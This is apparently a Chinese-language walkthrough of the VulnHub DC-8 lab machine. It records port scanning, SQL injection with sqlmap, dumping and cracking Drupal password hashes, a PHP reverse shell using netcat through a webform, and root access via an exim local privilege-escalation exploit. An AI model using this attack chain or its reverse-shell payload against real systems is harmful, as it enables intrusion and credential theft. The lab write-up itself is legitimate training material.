靶机下载

网站:https://www.vulnhub.com/

不得不说，本地下载真的慢，种子链接下载好香

在下载页面中找到第三个下载种子链接

打开百度网盘，找到离线下载，点击旁边的小箭头，选择添加BT任务，找到刚下载的种子文件，拖进去

此处会显示开始寻找资源然后自动下载，点击刷新可看到最新的下载情况（好像不会自动刷新，一直显示资源寻找中不要慌，手动刷新下）

靶机---DC-8

环境配置：

使用平台：VMware

网卡模式：NAT模式

所属网段：217

攻击机kali：192.168.217.131

靶机dc8：未知

一、信息获取

1.masscan -p22 192.168.217.0/24 --rate=2000  ---------扫描获取217网段下的linux系统的ip

获取到ip：192.168.217.148，目前只开启了kali和dc8，所以推测该ip为dc8的IP地址

2.nmap -sC -sV -p- -n 192.168.217.148 --min-rate=2000 -------扫描获取靶机端口信息

得到了： 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

80/tcp open  http    Apache httpd

3.searchsploit OpenSSH 7.4p1  ----------扫描ssh服务的系统漏洞

都是用户名枚举，没啥可用的

searchsploit Apache httpd  ----------扫描http服务的系统漏洞

都没啥有用的

4..gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20------探测目录

探测出很多目录，403无法访问，301资源被永久转移无法访问，只有200可用

5.gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -s200 -----筛选出了状态200（可访问）的目录

/0 (Status: 200)

/node (Status: 200)

/robots.txt (Status: 200)

/user (Status: 200)

6.访问192.168.217.148查看网站首页

7.访问其余目录

192.168.217.148/0

与首页没什么区别

192.168.217.148/node

内容翻译：尚未创建首页内容

192.168.217.148/user

这是个登陆注册界面，很重要

192.168.217.148/robots.txt

都是文本

二、漏洞挖掘

1.先从首页看起，查看源代码，正经的html编写没啥有用的

2.点点旁边的跳转链接，有了新发现

在导航栏处发现了疑似sql语句的东西，可以试试是否存在sql注入，虽然个人很喜欢直接分析源码，但都看出来了就先试试

输入了'，发现网站报错，sql注入实锤，，最后一行还给出了一条路径，不知道有没有用，先准备尝试爆库

路径：/var/www/html/sites/all/modules/mypages/mypages.module

3.直接在导航栏上输入语句试试

还是报错界面，什么都没有，那抓包看看

4.打开代理，打开burp suite抓包，再打开一次这个界面

发现字符被转义，为了加速实现效果，放弃手工注入，采取sqlmap

5.sqlmap -u "http://192.168.217.148/?nid=1" --dbs --------获取数据库表名

获取到两个数据库名，显然，d7db是我们要的数据库

6.sqlmap -u "http://192.168.217.148/?nid=1" -D d7db --tables ------获取数据库表名

一共探测出来了88个表，有一张users表，应该包含了登陆信息，继续探测

7.sqlmap -u "http://192.168.217.148/?nid=1" -D d7db -T users --columns------探测表里的列

探测出来了16列，name和pass应该是登录的账号和密码

8.sqlmap -u "http://192.168.217.148/?nid=1" -D d7db -T users  -C name,pass --dump ------获取数据

获取到了两行数据

admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

后面是一串加密数据

9.用burp suite解码看看，所有模式都试过了，全都不行，直接上百度

查到是要用john工具破解，用户名的john也是一种提示

Vi john---创建一个名为john的文件

把密码写入文档

John john --show  ------开始对密码解码

只获得了一个数据turtle

打开之前探测到的登录界面尝试

admin      turtle

john        turtle

john        turtle 进入成功，证明了admin密码破解失败

3.进入靶机

看到了ADD content 看到文本框，先输入点什么抓包看看

输入的内容都被转码了，无法直接编写shall脚本

再点点别的，在Contact Us 里找到了可以容纳php的地方

Contact Us--Webform--Form settings

此处输入shell<?php system("nc -e /bin/sh 192.168.217.131  8888"); ?>保存

在kali上开启监听nc -lvvp 8888

在view中随便输入点内容，kali成功获得shell

whoami       #查看当前用户身份

uname -a     #查看系统信息

history      #查看命令历史，有可能可以查看到管理员的一些重要命令，包括密码等

last         #查看登录历史

cat /etc/passwd  #查看用户

cat /etc/shadow  #查看密码

4.提权

先返回一个稳定的shell

python -c "import pty;pty.spawn('/bin/bash')"

uname -a     #查看内核信息

searchsploit Linux dc-8 4.9.0-4-amd64 -----扫描内核漏洞

想先从内核漏洞提权出来，但是扫描不到结果

利用suid提权试试

find / -perm -u=s -type f 2>/dev/null  ----查看具有root用户权限的文件

不知道哪个有用了，查看百度得知，exim4是个特殊文档那就扫描他的漏洞

根据经验exim4应该是exim的第四代，所以搜索exim的漏洞即可

searchsploit exim

搜出来好多，根据翻译结果，Local Privilege Escalation译为本地权限提升，是我们需要的

选择.sh文件的46996.sh

locate 46996.sh------定位文件

文件位置：/usr/share/exploitdb/exploits/linux/local/46996.sh

靶机中：scp root@192.168.217.131:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/q.sh ----获取文件

chmod 777 q.sh ----给予权限

bash ./q.sh -m netcat-----提权

失败，字符有问题，百度一下，源文件是doc格式，linux只识别unix，要在kali中修改文件格式再上传

cd /usr/share/exploitdb/exploits/linux/local/

vi 46996.sh

:set ff? # 查询文件格式

:set ff=unix # 将文件格式改成Unix格式

再重做获取文件，权限基于和提权

提权成功

Cd /root

Ls

Cat flag.txt

成功！